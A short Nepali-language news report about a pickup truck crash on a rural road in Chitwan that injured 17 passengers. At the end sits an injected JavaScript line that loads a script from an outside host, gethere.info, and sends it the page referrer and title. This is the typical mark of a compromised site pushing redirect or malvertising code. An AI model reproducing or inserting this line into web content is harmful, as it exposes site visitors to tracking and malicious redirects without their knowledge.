accidentचितवन, कात्तिक २ – चितवनको दारेचोक गाविसको ग्रामीण सडकमा बोलेरो पिकअप गाडी दुर्घटना हुँदा १७ जना यात्रु घाइते भएका छन् ।

इच्छाकामनाबाट फिस्लिङ आउने क्रममा गाउँको कच्ची सडकमा चल्ने ग २ च ३८१५ नम्बरको पिकअप गाडी आफैँ अनियन्त्रित भई दुर्घटना भएको जिल्ला प्रहरी कार्यालय चितवनले जनाएको छ ।

गएराति करिव ९ः३० बजेको समयमा भएको उक्त दुर्घटनामा १७ जना यात्रु घाइते भएको जिल्ला प्रहरी कार्यालय चितवनले जनाएको छ । गाडी सडकबाट २० मिटर तल खसेको प्रहरीको भनाइ छ ।

उनीहरुको अहिले कलेज अफ मेडिकल साइन्सेज भरतपुर चितवनमा उपचार भइरहेको छ । उनीहरुको अवस्था मध्यम रहेको प्रहरीले जनाएको छ । यहाँको ग्रामीण क्षेत्रमा निकै भिरालो र जोखिमयुक्त सडक रहेको छ जसका कारण दुर्घटनाको भय हुन्छ ।

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;